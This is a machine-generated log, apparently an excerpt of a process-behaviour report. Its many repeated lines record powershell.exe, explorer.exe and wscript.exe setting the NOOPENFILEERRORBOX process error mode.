          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
